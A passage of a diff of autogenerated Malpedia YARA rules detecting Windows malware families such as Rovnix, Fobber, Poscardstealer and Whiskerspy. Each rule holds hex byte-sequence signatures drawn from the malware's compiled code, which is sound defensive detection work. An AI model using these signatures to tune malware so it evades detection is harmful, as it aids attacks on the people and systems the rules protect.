e8???????? 8b15???????? ff35???????? e8???????? } - $sequence_8 = { ba???????? e8???????? 8d0d28b14000 5a e8???????? 8b15???????? ff35???????? } - $sequence_9 = { c705????????02000000 893d???????? c705????????dd424000 c705????????80464000 c705????????da464000 c705????????00474000 } + $sequence_0 = { 85c0 7511 8d85e8fcffff 50 ff15???????? } + $sequence_1 = { 3b9090830000 0f8e9d000000 8b4df0 8b819c830000 0345fc 6bc003 99 } + $sequence_2 = { 83c40c c785e0fcffff01000000 ff15???????? 8985f4feffff 8b95e0fcffff 52 8b85f0feffff } + $sequence_3 = { b9fa000000 2bc8 898dd8fcffff 8b95e8fdffff 52 e8???????? 83c404 } + $sequence_4 = { 83ec0c 56 894df4 66c745fc0000 eb0c 668b45fc 66050100 } + $sequence_5 = { 85c0 746d 8d4dfc 51 8d55f8 52 e8???????? } + $sequence_6 = { 8b450c 25ffff0000 50 8b4dec 51 ff15???????? 8945fc } + $sequence_7 = { 0fbf4dec 3bc1 7d7d 8b4de4 e8???????? 668945f4 0fbf55f4 } + $sequence_8 = { 81eafd000000 668955ec 66c745e80000 eb0c 668b45e8 66050100 668945e8 } + $sequence_9 = { 83bde8fdffff00 7574 6800010000 6a00 8d85ecfdffff 50 } condition: - 7 of them and filesize <270336 + 7 of them and filesize <630784 } -rule MALPEDIA_Win_Upas_Auto : FILE +rule MALPEDIA_Win_Lock_Pos_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "4474338e-2402-5a41-aa33-f4db4dabe7ff" + id = "d847ae83-76cd-5967-803e-bdb0585a6606" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.upas" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.upas_auto.yar#L1-L126" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lock_pos" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.lock_pos_auto.yar#L1-L140" license_url = "N/A" - logic_hash = "13e71741a108b9f3493f31fa88f76272d0cb37e67292b4fc5655cf9c429831b0" + logic_hash = "36f811da9c497d4d7cb3a11de01255e73f7c0aa2aa971faa2dbafeeb60cefda6" score = 75 quality = 75 tags = "FILE" @@ -135680,32 +138434,35 @@ rule MALPEDIA_Win_Upas_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 6a00 8d45f8 50 8d45f0 50 ff15???????? } - $sequence_1 = { ffd6 33c0 eb18 6a00 57 } - $sequence_2 = { ff751c e8???????? ff7620 ff763c e8???????? 8b4d10 8bd8 } - $sequence_3 = { ff15???????? 8945fc 3bc7 7504 33c0 eb64 56 } - $sequence_4 = { 50 53 ff15???????? 8945f4 3bc3 7504 } - $sequence_5 = { 83c420 53 6880000000 6a02 53 53 68000000c0 } - $sequence_6 = { 8944b5dc 837cb5dc00 59 59 7406 46 83fe07 } - $sequence_7 = { ff15???????? ff75e8 8d4598 6a22 50 e8???????? } - $sequence_8 = { 72d1 5e c3 8b442410 8b08 3b0d???????? } - $sequence_9 = { ff15???????? 85c0 742d 8d8500fdffff 50 } + $sequence_0 = { 8bec 8b4508 8b0d???????? 8b0481 } + $sequence_1 = { 55 8bec 837d0800 7704 } + $sequence_2 = { 55 8bec 81eca4040000 56 } + $sequence_3 = { 8d85f8fdffff 50 6a00 6a00 6a23 6a00 ff15???????? } + $sequence_4 = { 0fb64dfb 85c9 741c 8b5514 8b45fc } + $sequence_5 = { 2bc8 c745fc04000000 8a1401 8810 40 } + $sequence_6 = { 8b55f8 8b4508 8910 8b45c4 } + $sequence_7 = { 3bc6 0f85a1000000 32db e8???????? 84db } + $sequence_8 = { 8b55fc 8b450c 0fb70c50 334d14 } + $sequence_9 = { 33c9 84c0 0f95c1 41 51 ff75e4 } + $sequence_10 = { 894dfc 8b55dc 83c201 8955dc ebd2 8b45f8 } + $sequence_11 = { e8???????? 83c408 8d9568ffffff 52 e8???????? 83c404 50 } + $sequence_12 = { 50 eb4b 8b45f8 3bc3 764e 03c7 } condition: - 7 of them and filesize <114688 + 7 of them and filesize <319488 } -rule MALPEDIA_Win_Komprogo_Auto : FILE +rule MALPEDIA_Win_Whiskerspy_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "c2da7eb7-9058-5d5c-a1b3-cf7ec20183b8" + id = "ad364f6a-593c-546a-abca-058cacdb86c1" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.komprogo" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.komprogo_auto.yar#L1-L125" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.whiskerspy" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.whiskerspy_auto.yar#L1-L150" license_url = "N/A" - logic_hash = "9104f7103ef4ffc58ac248efbbf51156333295a0a474355899a4b0ca03e1b39e" + logic_hash = "5c2084905c4059cab930cb01fc75781ec2a6ce873c993665138e09c62922860b" score = 75 quality = 75 tags = "FILE" @@ -135719,34 +138476,39 @@ rule MALPEDIA_Win_Komprogo_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d8670720300 89861b630000 8d96f0a80300 8996e51d0300 8d8e40490400 } - $sequence_1 = { 8d86a82f0400 89862cb50200 8d86a8700300 89862cd50000 8d86f0380400 898616410200 8d8680720300 } - $sequence_2 = { 51 8d8618cf0300 8bcf e8???????? 83c404 } - $sequence_3 = { 8d96e4970300 899625080100 898633080100 8d96d0700300 8996e5650200 8d96f4380400 899643080100 } - $sequence_4 = { 8d9614790300 899694e70300 8d86242c0400 8986c1210300 8d86e15c0300 898636ca0000 8d86a8ad0300 } - $sequence_5 = { 0f859e000000 85f6 0f8496000000 8b433c 0fb7541814 } - $sequence_6 = { 898e47bd0200 8d8e20e20300 898e4f7e0200 8d9694a30300 899674750300 8d8ea82f0400 898e897e0200 } - $sequence_7 = { ff15???????? 8b95f0fdffff 8902 33db 85f6 7445 8bb5f0fdffff } - $sequence_8 = { 52 ffd7 8b85d0f3ffff 50 ffd7 8b4df8 5f } - $sequence_9 = { 8d86e0930200 8986d4930200 8d8ec1610300 898e14b20300 } + $sequence_0 = { 8b06 8bcf d3e8 a801 } + $sequence_1 = { 488bcf c645e57d c645e67d c645e77d c645e87d } + $sequence_2 = { 458bc6 488d95c0020000 488d8d80010000 ff15???????? 488d4c2460 ff15???????? } + $sequence_3 = { 5d c3 418bca 48899c2440020000 } + $sequence_4 = { 33c0 e9???????? c685c0020000c8 c685c1020000d3 } + $sequence_5 = { e8???????? 0f2805???????? 4c8d45b0 0f280d???????? 488d55f0 } + $sequence_6 = { 8bf9 488d1507c10000 b903000000 4c8d05f3c00000 e8???????? } + $sequence_7 = { 85c0 7428 817c245000040000 74b4 eb1c } + $sequence_8 = { 0fbec1 83e820 83e07f 8b04c5d43f4300 } + $sequence_9 = { 33c5 8945fc 53 8bd9 899540ffffff 8b4d0c } + $sequence_10 = { f30f38f6f8 897de4 b800000000 8b7de8 660f38f6f9 } + $sequence_11 = { 8b45ec 3bc6 7c3a 7f04 } + $sequence_12 = { 6af6 ff15???????? 8b04bd403d4400 834c0318ff 33c0 } + $sequence_13 = { 75f8 8bfe 8bca 8bb588feffff } + $sequence_14 = { a3???????? 8bcf e8???????? 8325????????00 8325????????00 } condition: - 7 of them and filesize <1045504 + 7 of them and filesize <591872 } -rule MALPEDIA_Win_Dircrypt_Auto : FILE +rule MALPEDIA_Win_Rovnix_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "b395b5b7-d790-5f9f-ab3c-658138d51b34" + id = "6d0efd0b-959b-5f07-9cf2-cb58dc189913" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dircrypt" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.dircrypt_auto.yar#L1-L129" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rovnix" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rovnix_auto.yar#L1-L389" license_url = "N/A" - logic_hash = "9b92693268fddc2e1dd801012d692fa19a40b6fbb8b33ec64e384964127e0228" + logic_hash = "5e2878b298d1848da7bc42b9c6ab694e8616fdab743143a73f75bed6d973bc79" score = 75 - quality = 75 + quality = 50 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -135758,34 +138520,68 @@ rule MALPEDIA_Win_Dircrypt_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 7531 c705????????01000000 e8???????? e8???????? 833d????????00 7514 68???????? } - $sequence_1 = { e8???????? e8???????? 68???????? ff15???????? 833d????????00 751a } - $sequence_2 = { 68???????? e8???????? 05d2070000 50 e8???????? a3???????? 6a13 } - $sequence_3 = { 8bec 51 6a00 6a00 8d45fc 50 68???????? } - $sequence_4 = { 68???????? 8d45dc 50 e8???????? 6a00 e8???????? } - $sequence_5 = { 6801000080 e8???????? e8???????? e8???????? e8???????? } - $sequence_6 = { e8???????? 05d5070000 50 6a01 6a02 6a08 } - $sequence_7 = { 68???????? 8d45dc 50 e8???????? 6a00 e8???????? 05d6070000 } - $sequence_8 = { 833d????????00 7514 68???????? 68???????? e8???????? a3???????? 833d????????00 } - $sequence_9 = { 51 6a00 6a00 8d45fc 50 68???????? 6802000080 } + $sequence_0 = { 8bf8 83c335 c1e902 ad 2bc3 ab e2fa } + $sequence_1 = { 7405 57 6a00 ffd2 89442408 } + $sequence_2 = { 83e7f0 89542418 83c710 8bea } + $sequence_3 = { be???????? 8b15???????? 83e7f0 89542418 } + $sequence_4 = { 60 bf40090000 be???????? 8b15???????? } + $sequence_5 = { ff15???????? 8b550c 884304 8bc2 c1e802 25ff000000 8d4cc324 } + $sequence_6 = { 83c220 85c0 7404 3bc2 } + $sequence_7 = { 7405 8d4e1c 8908 8b4508 } + $sequence_8 = { 7511 ff4e18 7505 e8???????? } + $sequence_9 = { 85c0 e8???????? 8be5 5d } + $sequence_10 = { 894804 8b4608 8b4e0c 8901 894804 8b4718 } + $sequence_11 = { 8936 8d7e08 897f04 893f 894e14 895e10 } + $sequence_12 = { 83f919 7703 83c220 85c0 } + $sequence_13 = { 8975d0 c745d800020000 8975d4 8975dc 8975e0 } + $sequence_14 = { 8b7e10 eb06 8b5d0c 8b7d08 8bcf ff15???????? } + $sequence_15 = { 7521 8bc3 c1e802 25ff000000 8d4cc724 8b01 } + $sequence_16 = { 5d c3 85c9 e8???????? } + $sequence_17 = { 5d c3 85c0 e8???????? } + $sequence_18 = { 16 85c9 23d2 59 } + $sequence_19 = { 55 8bec 85db 85c9 } + $sequence_20 = { 23db 81e1ff000000 23c9 83440c0404 } + $sequence_21 = { 23c9 81e1ffff0000 85c0 51 85c9 e8???????? 8be5 } + $sequence_22 = { 8b4d08 85d2 81e1ff000000 85db 83440c0404 23d2 } + $sequence_23 = { 45 7d58 95 08c1 a3???????? 5c 46 } + $sequence_24 = { 59 23db 23d2 81e1ffff0000 85c0 85c0 51 } + $sequence_25 = { 20a8261ce0dc 3d6235c121 652572f7a5a7 ce } + $sequence_26 = { 7e27 0cc7 8e610b 69f8d60e5ca1 2e08450d } + $sequence_27 = { 03ea 680c000000 012c24 8b0d???????? } + $sequence_28 = { 17 d3fb 7127 49 ee } + $sequence_29 = { 4c8bdc 49895b08 49897310 57 4883ec30 33c0 } + $sequence_30 = { 4b af 7dce 98 } + $sequence_31 = { 498be8 488bfa 7429 498d4320 488bd1 498d4bc8 } + $sequence_32 = { 498b5b38 498b6b40 498b7348 8bc7 498be3 415f } + $sequence_33 = { 61 54 99 46 45 e7f2 0ad7 } + $sequence_34 = { 807bf9f3 53 56 b88302010b 92 090468 } + $sequence_35 = { 59 85c0 85c0 81e1ffff0000 23d2 85db 51 } + $sequence_36 = { ff15???????? 4c8d5c2460 498b5b18 498b6b20 } + $sequence_37 = { 488364245800 488364247000 488364247800 488d442430 4c8d4c2440 } + $sequence_38 = { 46 92 c55151 a2???????? d24b46 } + $sequence_39 = { ff15???????? b8feff0000 483bf0 480f47f0 } + $sequence_40 = { 23d2 85db 8b4d08 85db } + $sequence_41 = { 81e1ffff0000 23d2 23c9 51 85c0 e8???????? } + $sequence_42 = { e19b 06 6d 99 } + $sequence_43 = { 61 c0390e 60 da57b2 } condition: - 7 of them and filesize <671744 + 7 of them and filesize <548864 } -rule MALPEDIA_Win_Darkpulsar_Auto : FILE +rule MALPEDIA_Win_Darkcloud_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "b29c7cf0-59bf-59a4-b8c5-d1ee53d551a4" + id = "b0268fec-89c8-5323-9f85-c9d45089af7c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkpulsar" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.darkpulsar_auto.yar#L1-L401" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkcloud" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.darkcloud_auto.yar#L1-L133" license_url = "N/A" - logic_hash = "07b3040533891d5ece5d93ef76c617792a76fc1b169e5d22dab675082baad80b" + logic_hash = "500bafad0751f0834ef38cd2423929e4bf071aa68fdd5512e97c403f17f02fd3" score = 75 - quality = 50 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -135797,66 +138593,32 @@ rule MALPEDIA_Win_Darkpulsar_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff25???????? 33c0 40 c20c00 68???????? 64ff3500000000 } - $sequence_1 = { c20c00 68???????? 64ff3500000000 8b442410 896c2410 8d6c2410 2be0 } - $sequence_2 = { c21000 ff25???????? ff25???????? ff25???????? 33c0 } - $sequence_3 = { 3a01 1bc0 83e0fe 40 5f } - $sequence_4 = { 803f00 742e 47 ff450c 0fbe07 } - $sequence_5 = { 56 8b35???????? 57 8b7d08 eb09 } - $sequence_6 = { 59 59 3bd8 74e0 0fb607 } - $sequence_7 = { 50 ffd6 8bd8 8b450c 0fbe00 50 ffd6 } - $sequence_8 = { 56 e8???????? ff742414 50 e8???????? 83c410 } - $sequence_9 = { 6a01 50 ff15???????? 8bf0 59 } - $sequence_10 = { 83c410 83f8ff 0f95c1 49 8bc1 } - $sequence_11 = { 53 33d2 56 57 33c0 } - $sequence_12 = { ffd7 59 5f 5e c3 8b4c2404 85c9 } - $sequence_13 = { 8d45cc 50 57 e8???????? 83c410 85c0 } - $sequence_14 = { ffd6 59 59 8945f8 } - $sequence_15 = { f7d8 59 1bc0 59 40 c3 e9???????? } - $sequence_16 = { 8b5d10 56 8b7508 33d2 } - $sequence_17 = { e8???????? ff7514 89460c e8???????? } - $sequence_18 = { ff15???????? 8bf8 59 59 85ff 7502 } - $sequence_19 = { 8bc1 c3 8b442404 85c0 7501 c3 } - $sequence_20 = { 33c0 33d2 c3 8bff 55 8bec b863736de0 } - $sequence_21 = { e8???????? 59 5e 83f8ff } - $sequence_22 = { 59 5e 8b45fc c9 c3 } - $sequence_23 = { 56 e8???????? 59 85c0 7625 } - $sequence_24 = { e8???????? 8bf0 46 56 ff15???????? 59 } - $sequence_25 = { 40 894588 83659800 85c0 } - $sequence_26 = { 8903 894304 5f 8bc6 } - $sequence_27 = { ff75f0 56 57 ff15???????? 83c40c } - $sequence_28 = { 00db 7313 752f 3b742404 0f830b010000 } - $sequence_29 = { 8945cc 8945d0 8b4608 6a05 50 885dec } - $sequence_30 = { 66894df5 c745f702000000 e8???????? 83c408 } - $sequence_31 = { 0fb606 50 ff15???????? 83c41c 85c0 } - $sequence_32 = { 48 4e 897c2414 75eb 5f 8d4240 } - $sequence_33 = { 668903 8b45e8 8930 33c0 ebdc ff742408 ff15???????? } - $sequence_34 = { 00db 7309 75f4 8a1e 46 10db } - $sequence_35 = { 00db 7313 75e1 3b742404 0f8318010000 } - $sequence_36 = { 51 51 8b4508 8b4d0c 894dfc } - $sequence_37 = { 0facf908 c1ef08 48 4e } - $sequence_38 = { 8945e0 8945e4 8945d4 8945d8 8b450c 897de8 897ddc } - $sequence_39 = { 8d8df9feffff 53 51 899d5ceeffff 899d60eeffff } - $sequence_40 = { 8b4d08 8d7d0c 31c0 f3aa } - $sequence_41 = { ffd3 ff7594 ff15???????? 83c414 837d9c00 741c 837d0c07 } - $sequence_42 = { 33d7 c1ea10 5f 33d1 } - $sequence_43 = { 8bec 8b4508 894508 d94508 5d } + $sequence_0 = { 83c414 8d4db0 ff15???????? c745fc23000000 8b4d08 894da8 } + $sequence_1 = { 894598 894db0 8945a8 894dc0 8945b8 ff15???????? 50 } + $sequence_2 = { 6a00 51 8bf0 ff15???????? 50 56 6a00 } + $sequence_3 = { 8d8d68ffffff 51 ff15???????? c745fc06000000 ba???????? 8d4dcc ff15???????? } + $sequence_4 = { 8d855cffffff 8d8df8feffff 50 8d954cffffff 51 52 c7851cffffff08000000 } + $sequence_5 = { 668b55dc 663b954cffffff 0f8ff4000000 c745fc0c000000 8d45dc 894584 c7857cffffff02400000 } + $sequence_6 = { ff15???????? 8bd0 8d8df0feffff ff15???????? 50 8b559c 52 } + $sequence_7 = { 668b00 8975dc 662d0100 8975cc 0f80e4000000 8975ac 894584 } + $sequence_8 = { 50 8d4d94 51 e8???????? 8bd0 8d4d84 ff15???????? } + $sequence_9 = { ff15???????? 8bd0 8d4da8 ff15???????? 8d5588 52 8d458c } condition: - 7 of them and filesize <491520 + 7 of them and filesize <622592 } -rule MALPEDIA_Win_Chinad_Auto : FILE +rule MALPEDIA_Win_Fobber_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "55179322-c960-5946-aa14-87280de490d7" + id = "ab54349a-7d99-57ef-92f9-d6c817ce7b6a" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chinad" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.chinad_auto.yar#L1-L130" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fobber" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.fobber_auto.yar#L1-L175" license_url = "N/A" - logic_hash = "f63725bd92056d22834dfb19b05368c2071df890649a72d3254d014778d263a0" + logic_hash = "16740b1e84557358ab17bd4ccf852daa4c4e1c0339646d5e9060d6d119fab8ab" score = 75 quality = 75 tags = "FILE" @@ -135870,32 +138632,38 @@ rule MALPEDIA_Win_Chinad_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c7850cffffff00000000 eb55 c78550ffffffbc264300 8b9550ffffff 83c201 8995b4feffff 8b8550ffffff } - $sequence_1 = { 8b85a8feffff 899485acfeffff e9???????? b904000000 6bd100 8b4508 8b0c10 } - $sequence_2 = { 2bf8 8bc2 c1f819 03f0 897dec c1e019 } - $sequence_3 = { 895de8 1bde 0145f4 8b75ac 119d7cffffff 8b5dec 81c300001000 } - $sequence_4 = { 0fa4c119 c1ee07 c1e019 0bd1 0bf0 31b514fdffff } - $sequence_5 = { 0fa4f701 6a13 03f6 03b55cffffff 89b560ffffff 137dcc 81c600000001 } - $sequence_6 = { c1c802 33c8 8b85d4feffff 8bd8 03ca 2385d8feffff } - $sequence_7 = { 81d7745dbe72 019d14fdffff 11bd38fdffff 33d2 0facc81c c1e604 } - $sequence_8 = { 8b4e24 83c40c c1e903 b838000000 83e13f 83f938 7205 } - $sequence_9 = { b894280000 e8???????? a1???????? 33c5 8945fc c78570d7ffff80280000 8d8570d7ffff } + $sequence_0 = { 89e5 51 8b4510 8b5508 8b4d0c 3002 c0c803 } + $sequence_1 = { 89e5 6a00 ff750c ff7508 e8???????? } + $sequence_2 = { 89e5 31c0 50 50 ff750c ff7508 50 } + $sequence_3 = { 57 51 8b7d08 30c0 31c9 f7d1 fc } + $sequence_4 = { e303 4f 89f8 5f 59 } + $sequence_5 = { 8b750c 8b4d10 39f7 760e 8d0431 39f8 7607 } + $sequence_6 = { 660fc146f9 6685c0 7515 0fb646f8 50 0fb746f6 } + $sequence_7 = { 55 89e5 6800800000 6a00 } + $sequence_8 = { 750f 0fb703 83f861 0f8301fe0000 } + $sequence_9 = { 57 33714b 8aa07b74cafc 16 aa 5a } + $sequence_10 = { 7527 e8???????? 83c020 3bf0 0f8434510100 e8???????? } + $sequence_11 = { 000f 843d???????? 328801008bff 55 8bec ff7514 6a00 } + $sequence_12 = { c00f84 40 17 0100 8b4d08 83600400 } + $sequence_13 = { 7706 6205???????? 294a75 f2149c 7674 } + $sequence_14 = { e8???????? 85f6 0f84fd610100 8b45d4 } + $sequence_15 = { 7508 e8???????? 59 59 5d c3 53 } condition: - 7 of them and filesize <598016 + 7 of them and filesize <188416 } -rule MALPEDIA_Win_Ice_Ix_Auto : FILE +rule MALPEDIA_Win_Poscardstealer_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "f7014fa0-a713-5faf-ab08-c5718709e2e0" + id = "30b86ec5-11cf-5ead-8d33-f96f4fd997a4" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ice_ix" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ice_ix_auto.yar#L1-L132" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.poscardstealer" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.poscardstealer_auto.yar#L1-L119" license_url = "N/A" - logic_hash = "fab5667b12ec8f3fc934ce2ccdb85e5f1acf73115ae434c2a20cd983e8b43fbd" + logic_hash = "e2bc29fc53d916c8c6261d35dc13ec4aa0c9f6d2e8252ac3a60894a094beda3f" score = 75 quality = 75 tags = "FILE" @@ -135909,32 +138677,32 @@ rule MALPEDIA_Win_Ice_Ix_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 3bc3 748c 6a01 8d4584 50 6883346425 e8???????? } - $sequence_1 = { 85db 0f844b020000 81fe00020000 0f873f020000 83fe06 0f86e5000000 8b03 } - $sequence_2 = { 50 e8???????? 50 53 8d857cfeffff 50 e8???????? } - $sequence_3 = { 56 57 6a02 5b 53 6821634578 } - $sequence_4 = { 8d75b8 b891000000 e8???????? 8d75d0 b892000000 e8???????? 8d75dc } - $sequence_5 = { 0f84dc000000 8d442420 50 ff15???????? 8db424c0000000 b8a2000000 e8???????? } - $sequence_6 = { 6a73 8d74243c 58 e8???????? 8bc6 89442410 } - $sequence_7 = { 6a42 8db550ffffff 58 e8???????? 8b75f4 8b55f0 3bf7 } - $sequence_8 = { 0f84a7000000 83f8ff 0f849e000000 6a3b 8d75e0 58 897dec } - $sequence_9 = { 68cc000000 6a2d 58 e8???????? ff75d0 ff15???????? 5f } + $sequence_0 = { c645fc01 e8???????? 8d4db8 51 50 8d55d4 } + $sequence_1 = { 33d2 bb07000000 895de8 8975e4 } + $sequence_2 = { 50 ff15???????? 8bf0 8d45b0 50 } + $sequence_3 = { 03c8 83fb10 7303 8d55d4 } + $sequence_4 = { 8bd1 c1fa05 c1e006 030495e0794200 eb05 b8???????? f6400420 } + $sequence_5 = { c785e8feffff7ce74100 8b8520ffffff c645fc07 894598 } + $sequence_6 = { 8b4da4 8b5590 8bc2 83f908 7303 } + $sequence_7 = { 885dd4 e8???????? 8b0d???????? 8b35???????? 2bce b893244992 f7e9 } + $sequence_8 = { 6800000040 50 ff15???????? 8bf0 8d45c4 50 } + $sequence_9 = { e9???????? 8d8d58feffff e9???????? 8d8d10ffffff e9???????? 8d8d48ffffff e9???????? } condition: - 7 of them and filesize <327680 + 7 of them and filesize <362496 } -rule MALPEDIA_Win_Screencap_Auto : FILE +rule MALPEDIA_Win_Opachki_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "104aba67-45fe-5a81-add7-5f096073514f" + id = "19945598-3be8-57e4-97f5-8518d611bbed" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.screencap" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.screencap_auto.yar#L1-L125" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.opachki" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.opachki_auto.yar#L1-L168" license_url = "N/A" - logic_hash = "d12bc6cdd7eeaf3c014435658ac08460e21def542afb74f89d01054fc70f3f9a" + logic_hash = "5313082ce77d197fd4bac8aec4c18a74cf4695d26acd8d2a84b13e24f5666e1a" score = 75 quality = 75 tags = "FILE" @@ -135948,32 +138716,38 @@ rule MALPEDIA_Win_Screencap_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 488b4c2450 488364242000 488d0591e90000 488b0cc8 4c8d4c2458 488d542460 498b0c0f } - $sequence_1 = { 41c1eb05 418d5f01 41c1e302 83fe08 } - $sequence_2 = { 4883ec20 4c8d25a09c0000 33f6 33db 498bfc 837f0801 7526 } - $sequence_3 = { 39842420100000 0f869f010000 6a04 687c334700 55 e8???????? } - $sequence_4 = { 488bce ff15???????? bf00080000 3bdf 7702 } - $sequence_5 = { 72ed 48833d????????00 741f 488d0d06130100 e8???????? } - $sequence_6 = { 8bdf e8???????? 85ff 741c 488d4c2450 0fb601 84c0 } - $sequence_7 = { 3bf8 0f869c000000 6a04 687c334700 55 e8???????? } - $sequence_8 = { 8d854c100000 50 ff15???????? 8bf0 8975e0 85f6 0f84bb030000 } - $sequence_9 = { 89470c 894710 894714 8d854c2c0000 50 e8???????? 6805040000 } + $sequence_0 = { c3 55 8bec 81ec00010000 ff7508 } + $sequence_1 = { 83c40c 8b4f04 8d0433 894708 c6040800 } + $sequence_2 = { 83c8ff 5f 5b 5e c9 c20800 8bc3 } + $sequence_3 = { 741c 8d4dd4 51 8d4df4 51 8d4dec } + $sequence_4 = { 885dfc e8???????? ff75e8 8d45f4 } + $sequence_5 = { ff7510 ff75fc ff15???????? 85c0 75e2 } + $sequence_6 = { 8b4608 8b4e04 c6040800 5f 8bc6 5e } + $sequence_7 = { 8bd8 7413 8b4704 03c8 53 } + $sequence_8 = { 8a0f 894508 84c9 744d 8a10 53 56 } + $sequence_9 = { c0e805 88470a 3c01 ac 7710 80fff6 7503 } + $sequence_10 = { aa 8944241c 61 c3 898389838983 898389838983 } + $sequence_11 = { f6c140 7412 08d2 7408 } + $sequence_12 = { 884707 83c140 eb0a 3ca0 7206 3ca3 } + $sequence_13 = { 7404 3c65 7505 884703 ebcc } + $sequence_14 = { f3aa 83ef25 8b742424 ac } + $sequence_15 = { 898389838983 898389838585 858585858585 878593859a9a } condition: - 7 of them and filesize <1391616 + 7 of them and filesize <122880 } -rule MALPEDIA_Win_Milum_Auto : FILE +rule MALPEDIA_Win_Ironwind_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "a4720d6d-5a40-5b38-8cc6-14b0dce6d896" + id = "59e0122b-e237-5b83-a993-a2711164e0ad" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.milum" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.milum_auto.yar#L1-L132" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ironwind" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ironwind_auto.yar#L1-L133" license_url = "N/A" - logic_hash = "3d087e33a30d06df9f4db7e1d4f924bf7ada8b431d51e99d5cf8912956a67294" + logic_hash = "db36742cc3e5372580f85bcac0b5325edc83e1defe6a3dbe06584de3a3fb0586" score = 75 quality = 75 tags = "FILE" @@ -135987,32 +138761,32 @@ rule MALPEDIA_Win_Milum_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8db53cffffff e8???????? 83c41c c645fc20 50 8d4d90 e8???????? } - $sequence_1 = { 837b1800 0f8507010000 8b45f0 50 8d75dc e8???????? 837b1800 } - $sequence_2 = { 50 e8???????? 8bc6 eb0f 885dfc 8d8d34ffffff } - $sequence_3 = { 8b4dcc 8b55c8 83c40c c78574ffffff44000000 8945ac 894db4 814da001010000 } - $sequence_4 = { 8d8d10feffff e8???????? c645fc1e 8d8df4fdffff e8???????? c645fc1d } - $sequence_5 = { 2bc6 c7421803000000 89421c 395a18 0f849cfeffff ddd8 ddd8 } - $sequence_6 = { 6bc064 2bc8 8d045590a64600 0fb610 8816 0fb64001 884601 } - $sequence_7 = { 385f45 7503 895704 8b7a04 897e04 8b7804 3b5704 } - $sequence_8 = { 8bca eb0e 8b55e8 2bd1 8b4e44 8955d4 894ddc } - $sequence_9 